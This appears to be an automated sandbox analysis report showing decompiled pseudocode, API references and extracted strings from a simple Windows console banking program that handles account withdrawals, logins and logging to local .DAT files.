                                                									__ecx =  *0x1252f28; // 0x0
                                                									_push(__ecx);
                                                									__eax = E01236DB6(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 4;
                                                									__eax = E01233610(__ebx, __edi, __esi, __fp0);
                                                								} else {
                                                									__edx = _v5;
                                                									__eflags = _v5 - 0x79;
                                                									if(__eflags == 0) {
                                                										goto L28;
                                                									}
                                                								}
                                                								goto L35;
                                                							case 7:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0) = E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to exit? <Y/N> : ");
                                                								__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__edx = _v5;
                                                								__eflags = _v5 - 0x59;
                                                								if(__eflags == 0) {
                                                									L32:
                                                									_t45 =  &_v36; // -15
                                                									__ecx = _t45;
                                                									__eax = E01238417(__eflags, _t45);
                                                									 *0x1252f28 = E01236EF1("LOG.DAT", "a");
                                                									_t46 =  &_v36; // -15
                                                									__edx = _t46;
                                                									_push(_t46);
                                                									_t47 =  &_v80; // -59
                                                									__eax = _t47;
                                                									_push(_t47);
                                                									_push(0x1252f40);
                                                									_push(0x1252ee0);
                                                									_push("%s %s %s %s\n");
                                                									__ecx =  *0x1252f28; // 0x0
                                                									_push(__ecx);
                                                									__eax = E01236F06(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 0x18;
                                                									__edx =  *0x1252f28; // 0x0
                                                									_push(__edx);
                                                									__eax = E01236DB6(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 4;
                                                									__eax = E012377B1(0);
                                                								} else {
                                                									__eax = _v5;
                                                									__eflags = _v5 - 0x79;
                                                									if(__eflags == 0) {
                                                										goto L32;
                                                									}
                                                								}
                                                								goto L35;
                                                						}
                                                					}
                                                					L35:
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				return 1;
                                                			}








































                                                0x01233610
                                                0x01233610
                                                0x01233610
                                                0x01233610
                                                0x01233619
                                                0x0123361f
                                                0x01233622
                                                0x01233625
                                                0x01233628
                                                0x0123362b
                                                0x0123362e
                                                0x01233631
                                                0x01233634
                                                0x01233637
                                                0x0123363e
                                                0x01233645
                                                0x0123364c
                                                0x01233654
                                                0x0123365d
                                                0x01233662
                                                0x01233667
                                                0x01233673
                                                0x01233678
                                                0x0123367d
                                                0x0123368f
                                                0x0123369b
                                                0x012336a0
                                                0x012336a5
                                                0x012336aa
                                                0x012336b1
                                                0x012336bc
                                                0x012336bf
                                                0x012336c3
                                                0x012336c5
                                                0x012336ce
                                                0x012336d3
                                                0x012336d8
                                                0x012336e4
                                                0x012336e9
                                                0x012336ee
                                                0x012336f3
                                                0x012336f8
                                                0x012336f8
                                                0x012336fd
                                                0x0123370e
                                                0x01233713
                                                0x01233716
                                                0x0123371b
                                                0x01233721
                                                0x01233725
                                                0x0123372f
                                                0x01233735
                                                0x0123373a
                                                0x01233740
                                                0x00000000
                                                0x00000000
                                                0x0123374b
                                                0x01233750
                                                0x01233755
                                                0x01233763
                                                0x01233768
                                                0x0123376d
                                                0x01233775
                                                0x01233775
                                                0x0123376d
                                                0x01233778
                                                0x0123377a
                                                0x01233780
                                                0x01233781
                                                0x01233786
                                                0x01233789
                                                0x0123378e
                                                0x01233792
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01233794
                                                0x01233798
                                                0x0123379d
                                                0x012337a2
                                                0x012337a7
                                                0x012337b3
                                                0x012337b3
                                                0x012337bf
                                                0x012337c4
                                                0x012337c7
                                                0x012337cc
                                                0x012337cc
                                                0x012337d5
                                                0x012337da
                                                0x012337df
                                                0x012337eb
                                                0x012337f0
                                                0x012337f5
                                                0x01233801
                                                0x01233806
                                                0x0123380b
                                                0x01233817
                                                0x0123381c
                                                0x01233821
                                                0x0123382d
                                                0x01233832
                                                0x01233837
                                                0x01233843
                                                0x01233848
                                                0x0123384d
                                                0x01233859
                                                0x0123385e
                                                0x01233863
                                                0x0123386f
                                                0x01233874
                                                0x01233879
                                                0x0123387e
                                                0x01233885
                                                0x0123388a
                                                0x0123389c
                                                0x0123389c
                                                0x012338a0
                                                0x00000000
                                                0x00000000
                                                0x012338a2
                                                0x012338a7
                                                0x012338ac
                                                0x01233896
                                                0x01233896
                                                0x01233899
                                                0x01233899
                                                0x012338b5
                                                0x012338ba
                                                0x012338bf
                                                0x012338c4
                                                0x012338c7
                                                0x012338d4
                                                0x012338d7
                                                0x012338db
                                                0x01233a43
                                                0x01233a4c
                                                0x01233a51
                                                0x01233a56
                                                0x01233a62
                                                0x01233a67
                                                0x01233a6c
                                                0x01233a71
                                                0x012338e1
                                                0x012338e4
                                                0x00000000
                                                0x012338eb
                                                0x00000000
                                                0x00000000
                                                0x012338f5
                                                0x00000000
                                                0x00000000
                                                0x012338ff
                                                0x00000000
                                                0x00000000
                                                0x01233909
                                                0x00000000
                                                0x00000000
                                                0x01233913
                                                0x00000000
                                                0x00000000
                                                0x0123391d
                                                0x00000000
                                                0x00000000
                                                0x01233930
                                                0x01233935
                                                0x0123393a
                                                0x0123393f
                                                0x01233942
                                                0x01233946
                                                0x01233949
                                                0x01233954
                                                0x01233954
                                                0x01233958
                                                0x01233972
                                                0x01233977
                                                0x01233977
                                                0x0123397a
                                                0x0123397b
                                                0x0123397b
                                                0x0123397e
                                                0x0123397f
                                                0x01233984
                                                0x01233989
                                                0x0123398e
                                                0x01233993
                                                0x01233994
                                                0x01233999
                                                0x0123399c
                                                0x012339a2
                                                0x012339a3
                                                0x012339a8
                                                0x012339ab
                                                0x0123394b
                                                0x0123394b
                                                0x0123394f
                                                0x01233952
                                                0x00000000
                                                0x00000000
                                                0x01233952
                                                0x00000000
                                                0x00000000
                                                0x012339be
                                                0x012339c3
                                                0x012339c8
                                                0x012339cd
                                                0x012339d0
                                                0x012339d4
                                                0x012339d7
                                                0x012339e2
                                                0x012339e2
                                                0x012339e2
                                                0x012339e6
                                                0x01233a00
                                                0x01233a05
                                                0x01233a05
                                                0x01233a08
                                                0x01233a09
                                                0x01233a09
                                                0x01233a0c
                                                0x01233a0d
                                                0x01233a12
                                                0x01233a17
                                                0x01233a1c
                                                0x01233a22
                                                0x01233a23
                                                0x01233a28
                                                0x01233a2b
                                                0x01233a31
                                                0x01233a32
                                                0x01233a37
                                                0x01233a3c
                                                0x012339d9
                                                0x012339d9
                                                0x012339dd
                                                0x012339e0
                                                0x00000000
                                                0x00000000
                                                0x012339e0
                                                0x00000000
                                                0x00000000
                                                0x012338e4
                                                0x01233a74
                                                0x01233a79
                                                0x01233a79
                                                0x01233a84

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01233667
                                                • _wprintf.LIBCMT ref: 0123367D
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wscanf.LIBCMT ref: 0123368F
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 012336A5
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                • _wprintf.LIBCMT ref: 012336D8
                                                • _wprintf.LIBCMT ref: 01233863
                                                • _wprintf.LIBCMT ref: 01233879
                                                • _wprintf.LIBCMT ref: 012338A7
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E21
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E54
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E6C
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233E80
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233E94
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233EAA
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233EBB
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233ED1
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233EE2
                                                • _wprintf.LIBCMT ref: 012338BF
                                                • _wprintf.LIBCMT ref: 012336EE
                                                  • Part of subcall function 012377B1: _doexit.LIBCMT ref: 012377BB
                                                • _swscanf.LIBCMT ref: 01233735
                                                • _wprintf.LIBCMT ref: 012337A2
                                                • __wstrtime.LIBCMT ref: 012337BF
                                                • _wprintf.LIBCMT ref: 012337DF
                                                • _wprintf.LIBCMT ref: 012337F5
                                                • _wprintf.LIBCMT ref: 0123380B
                                                • _wprintf.LIBCMT ref: 01233821
                                                • _wprintf.LIBCMT ref: 01233837
                                                • _wprintf.LIBCMT ref: 0123384D
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                • String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
                                                • API String ID: 1611355571-1720101819
                                                • Opcode ID: 7d4ece58a05335a514650151b2cc820101cead5f33927ff34e9b8fa5ad783810
                                                • Instruction ID: c97e78d35ff57704f51b266a57c2891e41bfbc009934773b4c93d9347c0e3cb9
                                                • Opcode Fuzzy Hash: 7d4ece58a05335a514650151b2cc820101cead5f33927ff34e9b8fa5ad783810
                                                • Instruction Fuzzy Hash: 4FA1B4F2EB4307ABEB15FBE49D43BBE76606BE1B10F004128E945752C0E9B1A2584767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 43%
                                                			E012349E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				char _v5;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v42;
                                                				char _v62;
                                                				char _v112;
                                                				char _v113;
                                                				char _v125;
                                                				char _v140;
                                                				char _v170;
                                                				char _v200;
                                                				char _v208;
                                                				char _v244;
                                                				char _v324;
                                                				char _v376;
                                                				char _v456;
                                                				void* __ebp;
                                                				intOrPtr _t64;
                                                				intOrPtr _t70;
                                                				intOrPtr _t75;
                                                				void* _t76;
                                                				intOrPtr _t77;
                                                				void* _t81;
                                                				char _t97;
                                                				intOrPtr _t99;
                                                				void* _t104;
                                                				intOrPtr _t105;
                                                				intOrPtr _t110;
                                                				void* _t117;
                                                				void* _t122;
                                                				void* _t127;
                                                				intOrPtr _t147;
                                                				intOrPtr _t148;
                                                				intOrPtr _t168;
                                                				intOrPtr _t173;
                                                				void* _t177;
                                                				void* _t180;
                                                				void* _t184;
                                                				void* _t185;
                                                				void* _t193;
                                                				void* _t195;
                                                				void* _t196;
                                                				void* _t205;
                                                
                                                				_t215 = __fp0;
                                                				_t176 = __esi;
                                                				_t175 = __edi;
                                                				_t132 = __ecx;
                                                				_t131 = __ebx;
                                                				_v16 = 0;
                                                				E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                				E012312B0(5, 0xa);
                                                				_push("Withdraw from A/C number          : ");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E0123738B("%s",  &_v28);
                                                				_t64 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t180 = _t177 + 0x14;
                                                				 *0x1252f28 = _t64;
                                                				_t214 = _v16;
                                                				if(_v16 == 0) {
                                                					E012320E0(_t132, __edi, __esi, _t214, __fp0);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Given A/C number does not exits!");
                                                					return E0123715C(__ebx, _t175, _t176, _t214);
                                                				}
                                                				E012312B0(0x32, 0xa);
                                                				_push( &_v376);
                                                				_push("[ %s ]");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E012312B0(5, 0xc);
                                                				_push("Amount to be Withdrawn (in NRs.)  : ");
                                                				E0123715C(__ebx, _t175, _t176, __eflags);
                                                				E0123738B("%f",  &_v12);
                                                				_t70 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t184 = _t180 + 0x1c;
                                                				 *0x1252f28 = _t70;
                                                				_v16 = 0;
                                                				while(1) {
                                                					_push( &_v32);
                                                					_push( &_v36);
                                                					_push( &_v40);
                                                					_push( &_v42);
                                                					_push( &_v140);
                                                					_push( &_v113);
                                                					_push( &_v62);
                                                					_push( &_v112);
                                                					_push( &_v125);
                                                					_push( &_v170);
                                                					_push( &_v200);
                                                					_t75 =  *0x1252f28; // 0x0
                                                					_t76 = E01237021(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                					_t185 = _t184 + 0x38;
                                                					__eflags = _t76 - 0xffffffff;
                                                					if(__eflags == 0) {
                                                						break;
                                                					}
                                                					_t122 = E01238230( &_v208,  &_v28);
                                                					_t184 = _t185 + 8;
                                                					__eflags = _t122;
                                                					if(__eflags == 0) {
                                                						asm("movss xmm0, [ebp-0x8]");
                                                						asm("comiss xmm0, [ebp-0x1c]");
                                                						if(__eflags > 0) {
                                                							E012320E0( &_v28, _t175, _t176, __eflags, _t215);
                                                							E012312B0(0x14, 0xc);
                                                							asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                							asm("movsd [esp], xmm0");
                                                							_push("Sorry, the current balance is Rs. %.2f only!");
                                                							E0123715C(_t131, _t175, _t176, __eflags);
                                                							E012312B0(0x19, 0xe);
                                                							_push("Transaction NOT completed!");
                                                							_t127 = E0123715C(_t131, _t175, _t176, __eflags);
                                                							_v16 = 1;
                                                							return _t127;
                                                						}
                                                					}
                                                				}
                                                				_t77 =  *0x1252f28; // 0x0
                                                				_push(_t77);
                                                				E01236DB6(_t131, _t175, _t176, __eflags);
                                                				E012320E0( &_v200, _t175, _t176, __eflags, _t215);
                                                				E012312B0(0x1e, 0xa);
                                                				_push("Confirm Transaction");
                                                				_t81 = E0123715C(_t131, _t175, _t176, __eflags);
                                                				asm("movss xmm0, [ebp-0x8]");
                                                				asm("movss [esp], xmm0");
                                                				E01231870(_t81,  &_v244);
                                                				E012312B0(3, 0xc);
                                                				_push( &_v376);
                                                				_push( &_v28);
                                                				E0123715C(_t131, _t175, _t176, __eflags);
                                                				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                				asm("movsd [esp], xmm0");
                                                				E01231B30( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
                                                				E01238140( &_v324,  &_v456);
                                                				E01238140( &_v324, "]");
                                                				E012312B0(0x28 - (E012382C0( &_v324) >> 1), 0xe);
                                                				_push( &_v324);
                                                				E01237229(_t131, _t175, _t176, __eflags);
                                                				E012312B0(8, 0x11);
                                                				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                				E0123715C(_t131, _t175, _t176, __eflags);
                                                				_t193 = _t185 + 0x14 - 8 + 0x1c;
                                                				_t97 = _v5;
                                                				__eflags = _t97 - 0x59;
                                                				if(_t97 == 0x59) {
                                                					L10:
                                                					 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                					_t99 = E01236EF1("TEMP.DAT", "w");
                                                					_t195 = _t193 + 0x10;
                                                					 *0x1252f24 = _t99;
                                                					_v16 = 0;
                                                					while(1) {
                                                						_push( &_v32);
                                                						_push( &_v36);
                                                						_push( &_v40);
                                                						_push( &_v42);
                                                						_push( &_v140);
                                                						_push( &_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_t168 =  *0x1252f28; // 0x0
                                                						_t104 = E01237021(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                						_t196 = _t195 + 0x38;
                                                						__eflags = _t104 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							break;
                                                						}
                                                						_t117 = E01238230( &_v208,  &_v28);
                                                						_t205 = _t196 + 8;
                                                						__eflags = _t117;
                                                						if(__eflags == 0) {
                                                							asm("movss xmm0, [ebp-0x24]");
                                                							asm("subss xmm0, [ebp-0x8]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [0x1248210]");
                                                						asm("comiss xmm0, [ebp-0x24]");
                                                						if(__eflags > 0) {
                                                							asm("movss xmm0, [ebp-0x20]");
                                                							asm("addss xmm0, [ebp-0x24]");
                                                							asm("movss [ebp-0x20], xmm0");
                                                							asm("movss xmm0, [0x1248210]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [ebp-0x24]");
                                                						asm("addss xmm0, [ebp-0x20]");
                                                						asm("movss [ebp-0x1c], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                						asm("movsd [esp], xmm0");
                                                						_push(_v42);
                                                						_push( &_v140);
                                                						_push(_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_push( &_v208);
                                                						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                						_t173 =  *0x1252f24; // 0x0
                                                						_push(_t173);
                                                						E01236F06(_t131, _t175, _t176, __eflags);
                                                						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
                                                					}
                                                					_t105 =  *0x1252f24; // 0x0
                                                					_push(_t105);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					_t147 =  *0x1252f28; // 0x0
                                                					_push(_t147);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					 *0x1252f28 = E01236EF1("TRANSACTION.DAT", "a");
                                                					E01238417(__eflags, 0x1252f30);
                                                					_push(0x1252ee4);
                                                					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                					asm("movsd [esp], xmm0");
                                                					_push(0x1252f30);
                                                					_push(0x1252f40);
                                                					_push("Cash+Withdrawn");
                                                					_push( &_v28);
                                                					_push("%s %s %s %s %.2f %s\n");
                                                					_t110 =  *0x1252f28; // 0x0
                                                					_push(_t110);
                                                					E01236F06(_t131, _t175, _t176, __eflags);
                                                					_t148 =  *0x1252f28; // 0x0
                                                					_push(_t148);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					E012320E0(_t148, _t175, _t176, __eflags, _t215);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Transaction completed successfully!");
                                                					return E0123715C(_t131, _t175, _t176, __eflags);
                                                				}
                                                				__eflags = _v5 - 0x79;
                                                				if(_v5 == 0x79) {
                                                					goto L10;
                                                				}
                                                				return _t97;
                                                			}


















































                                                0x012349e0
                                                0x012349e0
                                                0x012349e0
                                                0x012349e0
                                                0x012349e0
                                                0x012349e9
                                                0x012349f0
                                                0x012349f9
                                                0x012349fe
                                                0x01234a03
                                                0x01234a14
                                                0x01234a26
                                                0x01234a2b
                                                0x01234a2e
                                                0x01234a33
                                                0x01234a37
                                                0x01234a39
                                                0x01234a42
                                                0x01234a47
                                                0x00000000
                                                0x01234a51
                                                0x01234a5d
                                                0x01234a68
                                                0x01234a69
                                                0x01234a6e
                                                0x01234a7a
                                                0x01234a7f
                                                0x01234a84
                                                0x01234a95
                                                0x01234aa7
                                                0x01234aac
                                                0x01234aaf
                                                0x01234ab4
                                                0x01234abb
                                                0x01234abe
                                                0x01234ac2
                                                0x01234ac6
                                                0x01234aca
                                                0x01234ad1
                                                0x01234ad5
                                                0x01234ad9
                                                0x01234add
                                                0x01234ae1
                                                0x01234ae8
                                                0x01234aef
                                                0x01234afc
                                                0x01234b02
                                                0x01234b07
                                                0x01234b0a
                                                0x01234b0d
                                                0x00000000
                                                0x00000000
                                                0x01234b1a
                                                0x01234b1f
                                                0x01234b22
                                                0x01234b24
                                                0x01234b26
                                                0x01234b2b
                                                0x01234b2f
                                                0x01234b31
                                                0x01234b3a
                                                0x01234b3f
                                                0x01234b47
                                                0x01234b4c
                                                0x01234b51
                                                0x01234b5d
                                                0x01234b62
                                                0x01234b67
                                                0x01234b6f
                                                0x00000000
                                                0x01234b6f
                                                0x01234b2f
                                                0x01234b7b
                                                0x01234b80
                                                0x01234b85
                                                0x01234b86
                                                0x01234b8e
                                                0x01234b97
                                                0x01234b9c
                                                0x01234ba1
                                                0x01234ba6
                                                0x01234bab
                                                0x01234bb7
                                                0x01234bc0
                                                0x01234bcb
                                                0x01234bcf
                                                0x01234bdc
                                                0x01234beb
                                                0x01234bf3
                                                0x01234bf8
                                                0x01234c0b
                                                0x01234c1f
                                                0x01234c42
                                                0x01234c4d
                                                0x01234c4e
                                                0x01234c5a
                                                0x01234c5f
                                                0x01234c64
                                                0x01234c69
                                                0x01234c6c
                                                0x01234c70
                                                0x01234c73
                                                0x01234c82
                                                0x01234c94
                                                0x01234ca3
                                                0x01234ca8
                                                0x01234cab
                                                0x01234cb0
                                                0x01234cb7
                                                0x01234cba
                                                0x01234cbe
                                                0x01234cc2
                                                0x01234cc6
                                                0x01234ccd
                                                0x01234cd1
                                                0x01234cd5
                                                0x01234cd9
                                                0x01234cdd
                                                0x01234ce4
                                                0x01234ceb
                                                0x01234cf8
                                                0x01234cff
                                                0x01234d04
                                                0x01234d07
                                                0x01234d0a
                                                0x00000000
                                                0x00000000
                                                0x01234d1b
                                                0x01234d20
                                                0x01234d23
                                                0x01234d25
                                                0x01234d27
                                                0x01234d2c
                                                0x01234d31
                                                0x01234d31
                                                0x01234d36
                                                0x01234d3e
                                                0x01234d42
                                                0x01234d44
                                                0x01234d49
                                                0x01234d4e
                                                0x01234d53
                                                0x01234d5b
                                                0x01234d5b
                                                0x01234d60
                                                0x01234d65
                                                0x01234d6a
                                                0x01234d6f
                                                0x01234d77
                                                0x01234d7c
                                                0x01234d84
                                                0x01234d89
                                                0x01234d91
                                                0x01234d9a
                                                0x01234da1
                                                0x01234da6
                                                0x01234daa
                                                0x01234dae
                                                0x01234db2
                                                0x01234db9
                                                0x01234dc0
                                                0x01234dc7
                                                0x01234dc8
                                                0x01234dcd
                                                0x01234dd3
                                                0x01234dd4
                                                0x01234dd9
                                                0x01234dd9
                                                0x01234de1
                                                0x01234de6
                                                0x01234de7
                                                0x01234def
                                                0x01234df5
                                                0x01234df6
                                                0x01234e10
                                                0x01234e1a
                                                0x01234e22
                                                0x01234e27
                                                0x01234e2f
                                                0x01234e34
                                                0x01234e39
                                                0x01234e3e
                                                0x01234e46
                                                0x01234e47
                                                0x01234e4c
                                                0x01234e51
                                                0x01234e52
                                                0x01234e5a
                                                0x01234e60
                                                0x01234e61
                                                0x01234e69
                                                0x01234e72
                                                0x01234e77
                                                0x00000000
                                                0x01234e81
                                                0x01234c79
                                                0x01234c7c
                                                0x00000000
                                                0x00000000
                                                0x01234e87

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01234A03
                                                • _wscanf.LIBCMT ref: 01234A14
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _wprintf.LIBCMT ref: 01234A4C
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 01234A6E
                                                • _wprintf.LIBCMT ref: 01234A84
                                                • _wscanf.LIBCMT ref: 01234A95
                                                • _swscanf.LIBCMT ref: 01234B02
                                                • _wprintf.LIBCMT ref: 01234B51
                                                • _wprintf.LIBCMT ref: 01234B67
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                Strings
                                                • Given A/C number does not exits!, xrefs: 01234A47
                                                • TEMP.DAT, xrefs: 01234C9E
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01234CF3
                                                • %s %s %s %s %.2f %s, xrefs: 01234E47
                                                • Transaction completed successfully!, xrefs: 01234E77
                                                • [ %s ], xrefs: 01234A69
                                                • Cash+Withdrawn, xrefs: 01234E3E
                                                • %s to be Withdrawn from A/C number : %s [%s], xrefs: 01234BD7
                                                • ACCOUNT.DAT, xrefs: 01234AA2
                                                • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 01234C5F
                                                • Confirm Transaction, xrefs: 01234B9C
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01234DC8
                                                • Transaction NOT completed!, xrefs: 01234B62
                                                • Sorry, the current balance is Rs. %.2f only!, xrefs: 01234B4C
                                                • ACCOUNT.DAT, xrefs: 01234C87
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01234AF7
                                                • Withdraw from A/C number : , xrefs: 012349FE
                                                • TRANSACTION.DAT, xrefs: 01234E03
                                                • ACCOUNT.DAT, xrefs: 01234A21
                                                • Amount to be Withdrawn (in NRs.) : , xrefs: 01234A7F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
                                                • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
                                                • API String ID: 427838879-2716176803
                                                • Opcode ID: 79218169a1df4c539761c6bb264ff5ddd538448768600a6b1ea9dac949829136
                                                • Instruction ID: 6f04040dea22da68e6e4612a78f6d78f5b95c4a31de6082b418889cb45a8feed
                                                • Opcode Fuzzy Hash: 79218169a1df4c539761c6bb264ff5ddd538448768600a6b1ea9dac949829136
                                                • Instruction Fuzzy Hash: 5EC1B8F2D3020AABDB11EBE5DC81EEEB778AFA9700F044259F50576080F67066488FB5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

